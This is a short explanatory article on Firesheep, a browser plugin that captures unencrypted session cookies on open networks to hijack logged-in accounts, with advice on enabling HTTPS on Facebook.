Firesheep is primarily a packet analyzer, a program that captures data packets being sent over a network. These programs are commonly used to find and debug problems within the network, but can also be used maliciously to obtain personal information. When a network is unsecure, any unencrypted data that is sent over the network is easily readable by the user of a packet analyzer. Although user information such as credit card numbers and passwords are generally encrypted, the information Firesheep uses to hijack your account is not.
After a person logs onto a website, their username and password are verified, and the website sends a cookie to the user’s web browser. This cookie is then sent back whenever the user communicates with that website, allowing the person to remain logged in. Using a packet analyzer, someone could obtain this cookie as it is sent over the network and use it to communicate with the website. Since this is the same cookie as the user, on the same network, the hijacker can now use the website as the logged in user. Firesheep allows users to “test” this process on a number of websites with an easy to use interface.
When Firesheep is used on an open network, any user cookies being sent are captured and displayed by the plugin. The hijacker can then access these accounts by double clicking on the session icon. Although this program was created to demonstrate the vulnerability of unsecured networks, it is most likely being used to spy on people at the local Starbucks. Since Firesheep was created, Google and Facebook have made the switch to HTTPS, however only Google has made it standard. Facebook users need to switch their account by going to Account Settings, then clicking “enable secure browsing” in the Account Security pane.
